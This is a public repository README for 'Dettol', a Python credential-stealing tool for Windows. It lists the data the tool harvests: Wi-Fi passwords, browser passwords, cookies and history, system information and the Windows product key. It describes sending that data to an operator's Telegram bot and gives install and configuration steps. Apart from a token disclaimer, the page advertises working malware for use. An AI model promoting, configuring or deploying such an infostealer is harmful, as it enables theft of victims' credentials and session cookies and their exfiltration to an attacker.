haxorsec / dettol

Public Created: Aug 15, 2025

README.md

Dettol - Data Extractor Tool

A powerful Python-based suite for extracting sensitive user data from a Windows machine, including system information, Wi-Fi passwords, and data from Chromium-based browsers. All collected information is securely sent to a specified Telegram bot.

This tool is intended for educational and security research purposes only.

Banner ---

Features

  • 🖥️ Comprehensive System Info: Gathers detailed hardware, software, and network information, including OS version, product key, CPU, GPU, RAM, IP address, and installed antivirus.
  • 📡 Wi-Fi Password Recovery: Scans and decrypts all saved Wi-Fi profiles and their passwords.
  • 🌐 Advanced Browser Extraction:
    • Automatic Profile Detection: No need to manually specify browser profiles; the script finds them all automatically.
    • Multi-Browser Support: Works with Chrome, Edge, Brave, Opera, Vivaldi, and more.
    • Multi-threaded: Extracts data from multiple browser profiles concurrently for maximum speed.
    • Data Types: Recovers saved passwords, cookies, and browsing history.
  • 🔒 Secure Notifications: All collected data is sent directly to your private Telegram bot via a secure API.
  • ✨ User-Friendly Console: Provides clean, colorized, real-time feedback on the extraction process.

Requirements

  • Python 3.x
  • Windows Operating System
  • The following Python libraries:
    • requests
    • pycryptodome
    • pypiwin32
    • screeninfo
    • pycountry
    • psutil
    • winshell

Installation & Setup

  1. Clone the Repository (or download the script):

    exp clone https://exploit.or.id/haxorsec/dettol
    cd dettol
  2. Install Dependencies: Open a terminal or Command Prompt and run the following command to install all necessary libraries:

    pip install -r requirements.txt
  3. Configure the Script: Open the Python script (dettol.py) in a text editor and update the configuration section with your Telegram bot credentials:

    # ==============================================================================
    # --- CONFIGURATION ---
    # ==============================================================================
    BOT_TOKEN = 'YOUR_TELEGRAM_BOT_TOKEN'  # <-- REPLACE WITH YOUR BOT TOKEN
    CHAT_ID = 'YOUR_TELEGRAM_CHAT_ID'      # <-- REPLACE WITH YOUR CHAT ID

How to Run

Once the script is configured, simply run it from your terminal:

python dettol.py

The script will execute the following steps:

  1. Extract and send PC & hardware information.
  2. Extract and send saved Wi-Fi profiles.
  3. Extract and send browser data (passwords, cookies, history) as a .zip file.
  4. Clean up any temporary files.

All output will be displayed in the console with colored status indicators.

Old Tools Reference : https://github.com/danghuutruong/BrowserDataExtractor

Contact: HaxorSec - 2025 ©. All rights reserved.

Disclaimer

This tool is provided for educational purposes only. The author is not responsible for any misuse or damage caused by this script. Unauthorized access to computer systems and data is illegal. Use this script responsibly and only on systems you have explicit permission to test.

Description

A powerful Python-based suite for extracting sensitive user data from a Windows machine, including system information, Wi-Fi passwords, and data from Chromium-based browsers. All collected information is securely sent to a specified Telegram bot.

Repository Info

Created Aug 15, 2025
Visibility public
Files 4 items

Releases 0

No releases yet.